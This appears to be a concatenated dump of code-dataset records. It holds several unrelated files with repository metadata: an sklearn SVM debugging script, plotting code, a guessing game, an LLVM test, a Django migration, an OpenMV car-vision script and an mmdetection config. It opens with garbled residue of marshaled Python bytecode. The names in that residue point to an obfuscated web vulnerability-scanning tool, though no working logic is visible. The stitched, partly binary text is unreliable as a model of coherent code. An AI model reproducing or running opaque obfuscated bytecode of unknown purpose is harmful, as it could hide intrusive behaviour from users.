Version/12.16(v\x00\x00\x00R\x05\x00\x00\x00R\x06\x00\x00\x00R\x1c\x00\x00\x00t\x08\x00\x00\x00datetimeR\x0c\x00\x00\x00R^\x00\x00\x00R\xa1\x00\x00\x00R\xce\x00\x00\x00Rd\x00\x00\x00RS\x00\x00\x00R\xbb\x00\x00\x00t\t\x00\x00\x00cookielibt\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00RU\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR(\x00\x00\x00Rb\x00\x00\x00t\x13\x00\x00\x00requests.exceptionsR\x01\x00\x00\x00R\x02\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingRT\x00\x00\x00t\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheadersR\x08\x00\x00\x00R\x14\x00\x00\x00R\x0f\x00\x00\x00R \x00\x00\x00R.\x00\x00\x00R#\x00\x00\x00R\xd9\x00\x00\x00R\xd2\x00\x00\x00R\xda\x00\x00\x00R\xdb\x00\x00\x00R\xe5\x00\x00\x00R\xdc\x00\x00\x00R\x93\x00\x00\x00R\x9b\x00\x00\x00R\x9f\x00\x00\x00R\xa3\x00\x00\x00R\xa4\x00\x00\x00Rj\x00\x00\x00R\xa5\x00\x00\x00R\xa6\x00\x00\x00R\xa7\x00\x00\x00R\xa9\x00\x00\x00R&\x01\x00\x00R-\x01\x00\x00R.\x01\x00\x00R1\x01\x00\x00RV\x01\x00\x00t\x06\x00\x00\x00vulnott\x04\x00\x00\x00vulnR0\x00\x00\x00R1\x00\x00\x00R3\x00\x00\x00R=\x00\x00\x00R2\x00\x00\x00R;\x00\x00\x00R+\x00\x00\x00Rr\x00\x00\x00Ru\x00\x00\x00R\x80\x00\x00\x00R\x7f\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00R\x89\x00\x00\x00R\x8a\x00\x00\x00R\x8b\x00\x00\x00R?\x00\x00\x00R\x8c\x00\x00\x00R\x8d\x00\x00\x00R\x8e\x00\x00\x00Rv\x00\x00\x00R\xaa\x00\x00\x00R\xab\x00\x00\x00R\xac\x00\x00\x00R\xd0\x00\x00\x00R\xad\x00\x00\x00R\xae\x00\x00\x00R\xe3\x00\x00\x00R\xaf\x00\x00\x00R\xf3\x00\x00\x00R\xb0\x00\x00\x00R\xfd\x00\x00\x00R\xfe\x00\x00\x00R\xff\x00\x00\x00R\x00\x01\x00\x00R\x01\x01\x00\x00R\x11\x01\x00\x00R\x10\x01\x00\x00R\x12\x01\x00\x00R\x1a\x01\x00\x00R"\x01\x00\x00R\x13\x01\x00\x00R+\x01\x00\x00R,\x01\x00\x00R\x14\x01\x00\x00R\x15\x01\x00\x00R\x16\x01\x00\x00R\x17\x01\x00\x00R\x18\x01\x00\x00R@\x01\x00\x00R?\x01\x00\x00RA\x01\x00\x00R\xfb\x00\x00\x00RB\x01\x00\x00RC\x01\x00\x00RD\x01\x00\x00R_\x01\x00\x00RW\x00\x00\x00R\xc4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00<module>\x08\x00\x00\x00s\xd2\x00\x00\x00\x90\x01\x10\x01\x03\x01\x10\x01\r\x01\x11\x01\x03\x01\x10\x01\r\x01\x11\x01\x10\x01\x10\x04\n\x01\r\x01\x0c\x01\r\x01\x1c\x01\x0c\x03\t\x05\t\x07\t\n\t\x14\x06\x03\t\x05\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\t!\t\x17\t7\t\x17\t#\t\x1b\t7\t\x19\t"\t2\t;\t:\t@\t@\t7\tA\t9\tA\t\x14\t\x17\t\xb3\t\x1c\t&\t\x0f\t\x13\t\xa7\t6\t\x13\t\x14\t\x14\t=\tF\tF\t?\t\x16\t\x1a\t\x15\t\x1e\t!\t\x15\t\x1e\t)\t$\t,\t(\t!\t"\t\x14\t\x16\t\x1a\t=\t.\t1\t\x1e\t\x06\x0c\x17'''))
|
[
"[email protected]"
] | |
0187aa1b8fa9854b1f253d952bda031992f4b423
|
20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7
|
/old/pddbm/bug3.py
|
7d0a81d444b74c37e2e621dc7a08f50608b54c18
|
[] |
no_license
|
sarahboufelja54/galatea
|
f5664f0b3117629b2c5bbe078a1bd52bb5e359e6
|
002a9f2905868be25b71770190fb2d5eda11c861
|
refs/heads/master
| 2020-12-04T13:45:07.697189 | 2018-12-12T16:27:09 | 2018-12-12T16:27:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,268 |
py
|
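# Debugging script (Python 2): fits a linear-kernel sklearn SVC on random data, times
# fit/predict, and checks that the decision function can be rebuilt from coef_,
# intercept_, and the dual coefficients / support vectors.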
import numpy as np
from sklearn.svm import SVC
import time
rng = np.random.RandomState([1,2,3])
m = 1000
n = 1000
X = rng.randn(m,n)
w = rng.randn(n)
b = rng.randn(1)
y = (np.dot(X,w) + b ) > 0
t1 = time.time()
svm = SVC(kernel = 'linear', C = 1.0).fit(X,y)
t2 = time.time()
print 'train time ',t2 - t1
t1 = time.time()
y1 = svm.predict(X)
t2 = time.time()
print 'predict time ',t2 - t1
print '# support vectors:',svm.n_support_
print 'predict time per support vector:',(t2-t1)/float(svm.n_support_.sum())
coef = svm.coef_[0,:]
orig_coef = svm.coef_
t1 = time.time()
f = - np.dot(X, orig_coef.T) + svm.intercept_
y2 = f < 0
print y.shape
print y2.shape
print (y2 == y).shape
quit(-1)
t2 = time.time()
print 'dot product time',t2 -t1
print 'class 1 prevalence ',y.mean()
print 'predict accuracy ',(y1 == y).mean()
print 'dot product accuracy ',(y2 == y).mean()
print 'predict and dot agreement rate',(y1 == y2).mean()
coefs = svm.dual_coef_
assert len(coefs.shape) == 2
assert coefs.shape[0] == 1
coefs = coefs[0,:]
w = np.dot(svm.support_vectors_.T, coefs)
assert np.allclose(w,-coef)
f = np.dot(X,w) + b
y3 = (f < 0)
print 'agreement rate with my method: ',(y3 == y1).mean()
print 'dot prod between sklearn coef_ and my coef_: ',np.dot(w,svm.coef_[0,:])
|
[
"[email protected]"
] | |
14af6f90daa0b86d6aa3eb173dd22c4267364a3e
|
500a32cfae24028417215a79146c04d8cd0f12a3
|
/Figures/FigureS4.py
|
05fbe12a5889a12b91b07fcc4905e52285789c73
|
[] |
no_license
|
daphnar/URA_paper
|
bd431296d97908483db2f5be2d472074fcd03fe7
|
c08eba53c63ef7a410797491c60dd6dd0975ad62
|
refs/heads/master
| 2021-07-31T20:13:47.490159 | 2021-07-27T21:27:06 | 2021-07-27T21:27:06 | 232,321,758 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,727 |
py
|
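# Figure S4: saturation curves of prediction accuracy (R^2, %) versus cohort sample size
# for age, HbA1c% and BMI, comparing GBDT and Ridge models; saved as PDF and PNG.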
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import os
import matplotlib as mpl
#from Unicorn.Figures import nature_guidline_utils
from dark import cmap_map
from URA_paper.Figures import nature_guidline_utils
sns.set_style("ticks", {'axes.edgecolor': 'black'})
pd.set_option('display.width', 1000)
np.set_printoptions(precision=4, linewidth=200)
FIGURES_DIR = '/net/mraid08/export/jafar/Microbiome/Analyses/Unicorn/Cohort_Paper/revision_Analyses/figures'
params = {
'axes.labelsize': 10,
'font.size': 10,
'legend.fontsize': 10,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'figure.dpi': 300,
'axes.linewidth': 0.5,
}
fontsize = 10
plt.rcParams.update(params)
fig = plt.figure(figsize=(nature_guidline_utils.two_columns(),
nature_guidline_utils.full_page()*0.8*0.2), dpi=300) # m2inch(165)
import matplotlib.gridspec as gridspec
green=(47./255,142./255,52./255)
violet = (106./255,111./255,205./255)
two_colors = [violet,green]#colors_rgb[-2:]
axdrest_grid_bottom = gridspec.GridSpec(1,3,wspace=0.7,width_ratios=[1./3,1./3,1./3])
ax__age_saturation = plt.subplot(axdrest_grid_bottom[0,0])
ax__hba1c_saturation = plt.subplot(axdrest_grid_bottom[0,1])
ax__bmi_saturation = plt.subplot(axdrest_grid_bottom[0,2])
plt.sca(ax__age_saturation)
plt.text(-.53, 1.15, 'a', ha='center', va='center', transform=ax__age_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - age_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__age_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__age_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__age_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__age_saturation.yaxis.set_ticks_position('left')
ax__age_saturation.xaxis.set_ticks_position('bottom')
ax__age_saturation.spines['right'].set_visible(False)
ax__age_saturation.spines['top'].set_visible(False)
ax__age_saturation.set_xlim([0,20000])
ax__age_saturation.set_xticks([0,10000,20000])
plt.ylim(0,20)
ax__age_saturation.set_yticks([0,10,20])
plt.xlabel('Sample size')
plt.ylabel('age $R^{2}$ (%)')
plt.legend(['GBDT','Ridge'],bbox_to_anchor=(1.15, 0.0),frameon=False,loc=4)
plt.sca(ax__hba1c_saturation)
plt.text(-0.2, 1.15, 'b', ha='center', va='center', transform=ax__hba1c_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - hba1c_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__hba1c_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__hba1c_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__hba1c_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__hba1c_saturation.yaxis.set_ticks_position('left')
ax__hba1c_saturation.xaxis.set_ticks_position('bottom')
ax__hba1c_saturation.spines['right'].set_visible(False)
ax__hba1c_saturation.spines['top'].set_visible(False)
ax__hba1c_saturation.set_xlim([0,16000])
ax__hba1c_saturation.set_xticks([0,7500,15000])
plt.ylim(0,10)
ax__hba1c_saturation.set_yticks([0,5,10])#,20])
plt.xlabel('Sample size')
plt.ylabel('HbA1C% $R^{2}$ (%)')
plt.sca(ax__bmi_saturation)
plt.text(-.25, 1.15, 'c', ha='center', va='center', transform=ax__bmi_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - bmi_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__bmi_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__bmi_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__bmi_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__bmi_saturation.yaxis.set_ticks_position('left')
ax__bmi_saturation.xaxis.set_ticks_position('bottom')
ax__bmi_saturation.spines['right'].set_visible(False)
ax__bmi_saturation.spines['top'].set_visible(False)
ax__bmi_saturation.set_xlim([0,20000])
ax__bmi_saturation.set_xticks([0,10000,20000])
ax__bmi_saturation.set_yticks([0,5,10,15])
plt.xlabel('Sample size')
# plt.ylabel('')
plt.ylabel('BMI $R^{2}$ (%)')
plt.ylim(0,15)
plt.savefig(os.path.join(FIGURES_DIR, 'figureS_4.pdf'), bbox_inches='tight', format='pdf')
plt.savefig(os.path.join(FIGURES_DIR, 'figureS_4.png'), bbox_inches='tight', format='png')
|
[
"aaaa85Al"
] |
aaaa85Al
|
7085b43ca65f48b5500e2da986e2f06eda812634
|
b2eaa0024ba6c8c7986bf3e107deb7308e3658d0
|
/python/06_day/try_guess.py
|
494995380aa080787578df45b3f4f6c1e3b94487
|
[] |
no_license
|
olitskevich/szkolenie
|
aabf9589b0d5114761e77a0a4934821e1ba051ac
|
0e8d752e9753f262edae58d61795544c34fb6563
|
refs/heads/master
| 2020-04-25T05:51:52.234718 | 2019-03-09T14:42:56 | 2019-03-09T14:42:56 | 172,557,290 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 741 |
py
|
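# Number-guessing game: up to 7 attempts to guess a random number between 0 and 100;
# Ctrl+C ends the game with a thank-you message.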
import random
random_number = random.randint(0,100)
attempt = 0
max_attempt = 7
my_number = 555
try:
while my_number != random_number:
        print("Your number: ")
my_number = int(input())
attempt+=1
if my_number == random_number:
            print("Congratulations! You've guessed the number in", attempt, "attempts")
else:
if my_number > random_number:
print("Choose smaller number")
else:
print("Choose bigger number")
if attempt >= max_attempt:
print("Sorry! You have no more attempts, the correct number is", random_number)
break
except KeyboardInterrupt:
print ("Thanks for participation")
|
[
"[email protected]"
] | |
7df75a268c13f4de545db13ec51df02cd9cdbda5
|
ddcc89dc88961f37d50c0f9d893f265bf34afdb3
|
/test/test_simple_module_pass.py
|
f6be33ae365cbfb62819b6d08a8740fcd1ff5120
|
[
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"NCSA",
"LicenseRef-scancode-public-domain"
] |
permissive
|
mulle-nat/property-syntax-modernizer
|
f351319314a0216e5e241fa03f9d95a3764a6590
|
93445534221840d0df6cfb2d2f4ceb73f37ac962
|
refs/heads/master
| 2020-08-07T08:57:02.149734 | 2019-10-07T12:46:11 | 2019-10-07T12:46:11 | 213,381,270 | 0 | 0 |
Unlicense
| 2019-10-07T13:11:51 | 2019-10-07T12:47:05 |
C++
|
UTF-8
|
Python
| false | false | 442 |
py
|
import sys, unittest
from tools import SamplesTestCase
OUTPUT_FOR_GLOBALS = '''\
Found global named "gfloat": type = float*
Found global named "gppfloat": type = float***
Found global named "gint": type = i32*
'''
PROG = 'simple_module_pass'
class TestSimpleModulePass(SamplesTestCase):
def test_on_globals(self):
self.assertSampleOutput([PROG], 'globals.ll', OUTPUT_FOR_GLOBALS)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
244651275300889c2f7a9b4928af9c1940ad6614
|
4be9a5bdb8e051001b78c8f127ccc1a7f85c14e7
|
/bugzilla/migrations/0002_auto_20170205_1515.py
|
6b518a7b30a1bea8b1cda0d937046f6fe0febbe5
|
[] |
no_license
|
quentin-david/heimdall
|
f72a85606e7ab53683df2023ef5eaba762198211
|
84a429ee52e1891bc2ee4eb07a084dff209c789c
|
refs/heads/master
| 2021-01-21T10:26:28.895663 | 2017-07-21T19:19:46 | 2017-07-21T19:19:46 | 83,432,596 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 638 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-05 15:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bugzilla', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bugzilla',
options={'ordering': ['-date_update']},
),
migrations.AlterField(
model_name='bugzilla',
name='state',
field=models.CharField(choices=[('open', 'Open'), ('close', 'Close'), ('info', 'Info')], max_length=15),
),
]
|
[
"[email protected]"
] | |
56949c4db28de69646a0608078ccaa2021987d61
|
4de645802568e0317654e75afbe6d79db69317e5
|
/pythonx/snippet_helpers.py
|
53c12d4bac09f6abed674f1b50d73b5819df9624
|
[] |
no_license
|
liiil825/dotvim
|
25da0b499f0b94c69d26336d9917e3019e4c8262
|
40dea6d8970b02a8d141909207ff72bb1e9723c8
|
refs/heads/master
| 2023-04-05T22:31:48.199682 | 2023-03-29T08:39:04 | 2023-03-29T08:39:04 | 34,794,542 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 135 |
py
|
def fraction( a, b ):
try:
return "%.1f" % ( float( a ) / float( b ) )
except ( ValueError, ZeroDivisionError ):
return "ERR"
|
[
"[email protected]"
] | |
5221169cb09ef2c4efb91362996d07102086d2d9
|
fb8b3a8d5aff40d9d3169e53d94887f3053eb891
|
/19国赛openmv/main.py
|
77bf04f6390b17960c8a744531ea18e21cc7f910
|
[] |
no_license
|
nmgzzy/smart-car-history
|
e4f887da98bd53a59ac8c0c42cc3933d59d4e8a1
|
7d5f7eecb9692792a345ef8092add42013e2bb4a
|
refs/heads/master
| 2021-04-01T21:15:26.868584 | 2020-03-18T12:16:15 | 2020-03-18T12:16:15 | 248,215,450 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,989 |
py
|
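# OpenMV smart-car camera script: detects red/blue/black/white colour blobs, offers an
# on-screen threshold-tuning UI (parameters persisted via my_file), and reports detection
# results to the main controller over UART.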
import sensor, image, time, pyb
import my_ips, my_file, my_uart, my_key
sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framerate(2<<11)
sensor.set_framesize(sensor.QQVGA)#160x120
my_ips.init()
sensor.skip_frames(time = 500)
sensor.set_auto_gain(False)
sensor.set_auto_whitebal(False)
sensor.skip_frames(time = 100)
clock = time.clock()
ledR = pyb.LED(1)
ledG = pyb.LED(2)
ledB = pyb.LED(3)
ledB.on()
ledR.on()
ledG.on()
colorxy = 0
img_cnt = 0
red_threshold = [[12, 80, 16, 73, -1, 56],[12, 80, 16, 73, -1, 56],[12, 80, 16, 73, -1, 56],[0, 70, 19, 90, -11, 35]]
blue_threshold = [0, 50, -128, 127, -128, -5]
black_threshold = [0, 15, -128, 127, -128, 127]
white_threshold = [40, 100, -128, 127, -128, 127]
red_ch = 0
roi_white = [(109,0,2,120),(113,0,2,120),(117,0,2,120),(121,0,2,120)]
roi_white2 = [73,0,2,120]
roi_blue = [(0,21,33,77),(12,21,56,77),(0,21,68,77)]
roi_red = (47,25,103,70)
chioce = 2
def find_max(blobs):
max_size=0
for blob in blobs:
if blob[2]*blob[3] > max_size:
max_blob=blob
max_size = blob[2]*blob[3]
return max_blob
def my_cmp(a, b):
if a == b:
return (20,255,20)
else:
return (255,255,255)
def display(page, x, y, k, save):
global img_cnt
global red_ch
clock.tick()
img = sensor.snapshot()
if save:
img.save("img\\img%02d.jpg"%img_cnt)
img_cnt += 1
global colorxy
blobs = img.find_blobs([red_threshold[red_ch]], roi = roi_red, x_stride=5, y_stride=10, pixels_threshold=200)
if blobs:
road = find_max(blobs)
img.draw_rectangle(road.rect())
blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[2], x_stride=3, y_stride=6, pixels_threshold=64)
if blobs:
road = find_max(blobs)
img.draw_rectangle(road.rect())
blobs = img.find_blobs([white_threshold], roi = roi_white[chioce], pixels_threshold=9)
if blobs:
road = find_max(blobs)
img.draw_rectangle(road.rect())
print(clock.fps())
if x == 3 and y == 0:
img.binary([white_threshold], zero = True)
else:
if y < 2:
img.binary([red_threshold[red_ch]], zero = True)
else:
img.binary([blue_threshold], zero = True)
img.draw_string(0,0, str(red_threshold[red_ch][0]),color = my_cmp(colorxy, 0),x_spacing = -2)
img.draw_string(0,10, str(red_threshold[red_ch][1]),color = my_cmp(colorxy, 1),x_spacing = -2)
img.draw_string(40,0, str(red_threshold[red_ch][2]),color = my_cmp(colorxy, 2),x_spacing = -2)
img.draw_string(40,10,str(red_threshold[red_ch][3]),color = my_cmp(colorxy, 3),x_spacing = -2)
img.draw_string(80,0, str(red_threshold[red_ch][4]),color = my_cmp(colorxy, 4),x_spacing = -2)
img.draw_string(80,10,str(red_threshold[red_ch][5]),color = my_cmp(colorxy, 5),x_spacing = -2)
img.draw_string(0, 20,"red", color = (255,255,255), x_spacing = -2)
img.draw_string(120,0,"wt:", color = my_cmp(colorxy, 6),x_spacing = -2)
img.draw_string(140,0,str(white_threshold[0]),color = my_cmp(colorxy, 6),x_spacing = -2)
img.draw_string(120,10,str(red_ch), color = (255,255,0), x_spacing = -2)
img.draw_string(0,90, "blue", color = (255,255,255), x_spacing = -2)
img.draw_string(0,100, str(blue_threshold[0]),color = my_cmp(colorxy, 8),x_spacing = -2)
img.draw_string(0,110, str(blue_threshold[1]),color = my_cmp(colorxy, 9),x_spacing = -2)
img.draw_string(40,100,str(blue_threshold[2]),color = my_cmp(colorxy, 10),x_spacing = -2)
img.draw_string(40,110,str(blue_threshold[3]),color = my_cmp(colorxy, 11),x_spacing = -2)
img.draw_string(80,100,str(blue_threshold[4]),color = my_cmp(colorxy, 12),x_spacing = -2)
img.draw_string(80,110,str(blue_threshold[5]),color = my_cmp(colorxy, 13),x_spacing = -2)
img.draw_string(120,110, "blk", color = my_cmp(colorxy, 14),x_spacing = -2)
img.draw_string(140,110,str(black_threshold[1]),color = my_cmp(colorxy, 14),x_spacing = -2)
if page == 0:
my_ips.display_QQVGA(0, 0, img)
if x == 0:
if y == 0:
red_threshold[red_ch][0] += k
colorxy = 0
elif y == 1:
red_threshold[red_ch][1] += k
colorxy = 1
elif y == 2:
blue_threshold[0] += k
colorxy = 8+0
elif y == 3:
blue_threshold[1] += k
colorxy = 8+1
elif x == 1:
if y == 0:
red_threshold[red_ch][2] += k
colorxy = 2
elif y == 1:
red_threshold[red_ch][3] += k
colorxy = 3
elif y == 2:
blue_threshold[2] += k
colorxy = 8+2
elif y == 3:
blue_threshold[3] += k
colorxy = 8+3
elif x == 2:
if y == 0:
red_threshold[red_ch][4] += k
colorxy = 4
elif y == 1:
red_threshold[red_ch][5] += k
colorxy = 5
elif y == 2:
blue_threshold[4] += k
colorxy = 8+4
elif y == 3:
blue_threshold[5] += k
colorxy = 8+5
elif x == 3:
if y == 0:
white_threshold[0] += k
colorxy = 6
elif y == 1:
red_ch += k
colorxy = 7
elif y == 3:
black_threshold[1] += k
colorxy = 8+6
def systemUI():
page = 0
Xsite = 0
Ysite = 0
global red_threshold
global blue_threshold
global black_threshold
global white_threshold
global red_ch
[red_threshold, blue_threshold, black_threshold, white_threshold, red_ch] = my_file.read_parameter()
my_ips.showstr(161, 0, "bR 30:127")
my_ips.showstr(161, 1, " -50:50")
my_ips.showstr(161, 3, "R 40:127")
my_ips.showstr(161, 4, " -20:70")
my_ips.showstr(161, 6, "yR 30:127")
my_ips.showstr(161, 7, " 10:127")
while(True):
save = 0
key = my_key.get_key()
if key == 3:#r
if Xsite<3:
Xsite += 1
elif key == 6:#l
if Xsite>0:
Xsite -= 1
elif key == 2:#u
if Ysite>0:
Ysite -= 1
elif key == 0:#d
if Ysite<3:
Ysite += 1
elif key == 1:#m
save = 1
if key == 4:
k = 1
elif key == 5:
k = -1
else:
k = 0
display(page, Xsite, Ysite, k, save)
if my_uart.read() == 0x0F:
break
my_file.save_parameter(red_threshold, blue_threshold, black_threshold, white_threshold, red_ch)
ledR.off()
ledB.off()
my_ips.spi.deinit()
time.sleep(200)
ledG.off()
def main():
while True:
clock.tick()
pix = 0
break_road = 0
cnt1 = 0
cnt2 = 0
mode = 0
hh = 0
cc = 0
img = sensor.snapshot()
t = my_uart.read()
if t!= None:
mode = t >> 7
offset = t & 0x7F
blobs = img.find_blobs([red_threshold[red_ch]], roi = roi_red, x_stride=5, y_stride=10, pixels_threshold=200)
if blobs:
road = find_max(blobs)
pix = road.pixels() * 255 // 3000
if pix > 255:
pix = 255
if mode == 0:
blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[0], x_stride=3, y_stride=6, pixels_threshold=100)
if blobs:
road = find_max(blobs)
break_road = road.pixels()*255//2500
else:
blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[1], x_stride=3, y_stride=6, pixels_threshold=100)
if blobs:
road = find_max(blobs)
break_road = (road.pixels()-150)*255//3400
if break_road < 0:
break_road = 0
if break_road > 255:
break_road = 255
if mode == 1:
blobs = img.find_blobs([white_threshold], roi = roi_white[chioce], pixels_threshold=20)
if blobs:
road = find_max(blobs)
hh = road.h()
cc = road.cy()+1
else:
roi_white2[0] = int(-0.3297*offset+106.2)-3
blobs = img.find_blobs([white_threshold], roi = roi_white2, pixels_threshold=20)
if blobs:
road = find_max(blobs)
hh = road.h()
cc = road.cy()+1
my_uart.send(pix,break_road,cc,hh)
if pix > 30:
ledR.on()
else:
ledR.off()
if break_road > 170:
ledB.on()
else:
ledB.off()
print(clock.fps())
systemUI()
main()
|
[
"[email protected]"
] | |
a3cf7cefbf7e8537e0c1fe7a704c4158e33f881b
|
39e03684081b27311385a0ab31afcc2e09883e5c
|
/configs/reppoints/bbox_r50_grid_center_fpn_1x.py
|
f971b5b7b8c78a6abca727e7015b96d085b5f33b
|
[
"MIT",
"Python-2.0"
] |
permissive
|
witnessai/MMSceneGraph
|
8d0b2011a946ddcced95fbe15445b7f4da818509
|
bc5e0f3385205404c712ae9f702a61a3191da0a1
|
refs/heads/master
| 2023-08-12T06:54:00.551237 | 2021-10-12T03:04:21 | 2021-10-12T03:04:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,462 |
py
|
# model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=81,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='minmax',
use_grid_points=True))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
